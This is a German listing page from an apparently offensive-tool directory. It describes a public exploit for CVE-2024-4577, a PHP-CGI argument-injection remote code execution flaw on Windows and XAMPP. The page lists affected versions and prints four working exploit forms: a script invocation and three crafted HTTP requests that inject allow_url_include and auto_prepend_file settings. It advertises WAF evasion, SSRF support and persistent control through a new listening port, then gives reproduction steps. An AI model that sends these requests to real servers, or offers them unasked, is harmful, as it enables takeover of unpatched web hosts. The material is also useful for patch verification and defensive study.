Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-4577-PHP-RCE — [Schwachstellenreproduktion] Der weltweit erste EXP, der die PHP-Standardumgebung (XAMPP) für die CVE-2024-4577 PHP-CGI RCE Schwachstelle nutzt. | Kitploit
Tools/GitHubGitHub/xcanwin/cve-2024-4577-php-rce
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWAF-UmgehungPenetrationstestsPayload-Entwicklung
GitHubxcanwin/cve-2024-4577-php-rce

CVE-2024-4577-PHP-RCE

[Schwachstellenreproduktion] Der weltweit erste EXP, der die PHP-Standardumgebung (XAMPP) für die CVE-2024-4577 PHP-CGI RCE Schwachstelle nutzt.

Repository anzeigen
162334vor 2 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-4577-PHP-RCE

Projektbeschreibung und Prinzip

  • Der erste weltweite Exploit für CVE-2024-4577 PHP-CGI RCE, der die Standard-PHP-Umgebung (XAMPP) nutzt.
  • The world's first CVE-2024-4577 PHP-CGI RCE exploit utilizing the default PHP environment. Sharing original exploit, supports SSRF, supports WAF bypass.
  • Ermöglicht RCE in der Standard-PHP-Umgebung. Prinzip: cgi.force_redirect + REDIRECT-STATUS.
  • Neuer, origineller EXP, der Szenarien mit WAF-Bypass unterstützt. Prinzip: Einrichtung eines FastCGI-Servers + Kommunikation über das FastCGI-Protokoll.
  • Neuer, origineller EXP, der SSRF-Szenarien unterstützt. Prinzip: data://-Protokoll + GET-Anfrage.

Vorteile von EXP 1

  • Ermöglicht RCE ohne allow_url_include, auto_prepend_file, auto_append_file. Kann beliebige Dateien und PHP-Dateien einbinden.
  • Die von WAFs häufig blockierten Schlüsselwörter allow_url_include, auto_prepend_file, auto_append_file werden nicht verwendet.
  • Die gesamte Kommunikation des FastCGI-Servers wird nicht von der WAF protokolliert.
  • Hört auf einem neuen Port, sodass eine dauerhafte Kontrolle des PHP-Servers unabhängig von Apache und PHP erreicht wird.
  • Schwachstellenübersicht

    InformationInhalt
    SchwachstellennamePHP RCE
    SchwachstellennummerCVE-2024-4577
    RisikostufeHoch
    SchwachstellentypRCE
    AusnutzungsschwierigkeitNiedrig

    Betroffene Versionen

    • PHP Windows-Version 8.3.0 <= betroffene Version < 8.3.8
    • PHP Windows-Version 8.2.0 <= betroffene Version < 8.2.20
    • PHP Windows-Version 8.1.0 <= betroffene Version < 8.1.29
    • PHP Windows-Version betroffene Version == 8.0.x
    • PHP Windows-Version betroffene Version == 7.x
    • PHP Windows-Version betroffene Version == 5.x
    • XAMPP Windows-Version 8.2.0 <= betroffene Version <= 8.2.12
    • XAMPP Windows-Version 8.1.0 <= betroffene Version <= 8.1.25
    • XAMPP Windows-Version betroffene Version == 8.0.x
    • XAMPP Windows-Version betroffene Version == 7.x
    • XAMPP Windows-Version betroffene Version == 5.x

    EXP 1

    Kann für WAF-Bypass-Szenarien + Standard-Szenarien verwendet werden:

    root@kitploit:~
    python CVE-2024-4577-PHP-RCE.py PhpServerHost:PhpServerPort
    

    Beispiel:

    root@kitploit:~
    python CVE-2024-4577-PHP-RCE.py 123.123.123.123:80
    

    EXP 2

    Kann für SSRF-Szenarien + Standard-Szenarien verwendet werden:

    root@kitploit:~
    http://PhpServerHost:PhpServerPort/php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+-d+allow_url_include%3d1+-d+auto_prepend_file%3d"data:XCANWIN/XCANWIN;base64,PD9waHAgZGllKCJUZSIuInNUIik7Pz4g"
    

    EXP 3

    Kann für Standard-Szenarien verwendet werden:

    root@kitploit:~
    POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
    Host: PhpServerHost
    
    <?php die("Te"."sT");?>
    

    EXP 4

    Kann für Standard-Szenarien verwendet werden:

    root@kitploit:~
    POST /php-cgi/php-cgi.exe?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
    Host: PhpServerHost
    REDIRECT-STATUS: XCANWIN
    
    <?php die("Te"."sT");?>
    

    Reproduktion

    1. Serverumgebung:
    root@kitploit:~
    XAMPP Windows-Version 8.2.12
    
    1. XAMPP herunterladen und installieren:
    root@kitploit:~
    https://zenlayer.dl.sourceforge.net/project/xampp/XAMPP%20Windows/8.2.12/xampp-windows-x64-8.2.12-0-VS16-installer.exe?viasf=1
    
    Oder wählen Sie hier selbst betroffene Versionen aus: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/
    
    1. Serverkonfiguration
    root@kitploit:~
    Keine Änderungen erforderlich, Standardkonfiguration beibehalten
    
    1. EXP auf Client-Seite verwenden
    root@kitploit:~
    Testen mit obigem EXP
    
    1. Überprüfung
    root@kitploit:~
    Beobachten Sie, ob die Zeichenkette "TesT" oder der Inhalt der system.ini-Datei des Servers zurückgegeben wird
    
    Tool herunterladen